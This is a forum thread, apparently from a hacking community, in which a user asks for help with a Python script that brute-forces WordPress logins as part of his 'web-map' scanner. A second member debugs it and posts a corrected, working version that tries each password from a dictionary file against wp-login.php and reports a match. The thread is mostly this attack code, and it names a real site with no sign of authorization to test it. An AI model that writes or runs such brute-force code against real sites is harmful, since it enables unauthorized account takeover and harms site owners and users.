Need some help on my project.

L00PeR
7 years ago

0

Hi! :)
I’ve been doing a program called web-map.
it scans a website for vulnerabilities.
But I’m having some trouble with brute-forcing the wordpress login.
This is the code which brute-force the login:
```def brute_login(tgt, dictionary):
s = requests.Session()
pass_found = False

user = raw_input("User: ")  
intent = 0  
tgt = tgt+"/wp-login"  
f = open(dictionary, 'r')  
for word in f.readlines():  
    password = word.strip('\n')  
    intent+=1  
    payload = {'log': user, 'pwd': password, 'redirect_to': 'TARGET_URL/wp-admin', 'testcookie': '1', 'wp-submit': 'Access'}  
    print '[+] Trying with user: '+str(user)+' and password: '+str(password)+'\ttry: '+str(intent)  
    s.post(tgt, data=payload)  
    data = s.get("http://gerion.info/wp-admin").text  
    if 'Escritorio' in data or 'Desktop' in data:  
        print '[*] Password found: '+password  
        pass_found = True  
    else:  
        pass```

I hope you can help me, Thanks!! :D

Human Stupidity , thats why Hackers always win.
? Med Amine Khelifi

L00PeR
7 years ago

0

You can see the hole code on https://github.com/xVL00PeR/web-map

Human Stupidity , thats why Hackers always win.
? Med Amine Khelifi

Smyler [WHGhost]
7 years ago

1

Instead of doing the get request to know if you got connected, why don’t you just check the response to your post request? That would be much faster.

I don’t know wordpress, but maybe it is blocking you after a few attemps. Your code looks find without testing it.

L00PeR
7 years ago | edited 7 years ago

0

I don’t think Wordpress is blocking me because I have tried doing only one request with the correct credentials and I still cannot login.
And, how could I check the response to the post with python?

Human Stupidity , thats why Hackers always win.
? Med Amine Khelifi

Smyler [WHGhost]
7 years ago

0

session.post returns a response object, just like session.get, so you can change
s.post(tgt, data=payload) data = s.get("http://gerion.info/wp-admin").text
with
data = s.post(tgt, data=payload).text
and test the content of data.

Smyler [WHGhost]
7 years ago | edited 7 years ago

0

Ok, I tested your code, and I found what was wrong, and changed some things (for python3 support or cleaner code).

So this works well:
```def brute_login(tgt, dictionary):

s = requests.Session()  

# Let wordpress set it's cookies, instead of manually setting them.  
s.get(tgt)  

user = raw_input("User: ")  
intent = 0  
tgt = tgt + "/wp-login.php"  

passwords = []  
#We use a context manager, so that the file is closed.'  
with open(dictionary, 'r') as f:  
    passwords = f.read().rsplit('\n')  

for password in passwords:  
    intent += 1  
    payload = {  
        'log': user,  
        'pwd': password}  
    print('[+] Trying with user: {} and password: {}\ttry: {}'.format(  
        user,  
        password,  
        intent))  # Python 3 compatibility  

    # We use the response object from the post request.  
    data = s.post(tgt, data=payload)  

    #It's easier to check if we failed.'  
    if not 'ERROR' in data.text:  
        print('[*] Password found: {}'.format(password))  
        break  # Cleaner than else: pass```

I added comments, but if you need explanation, feel free to ask.

I am still learning python, so if anyone else finds something wrong with the above function, I will be happy to learn!

L00PeR
7 years ago

0

Ok thanks, that will help me.
I suggest you to use python 2.7, I think is better than 3.X.
And… Do you have a github account? just for writing on the code that you helped creating it…

Human Stupidity , thats why Hackers always win.
? Med Amine Khelifi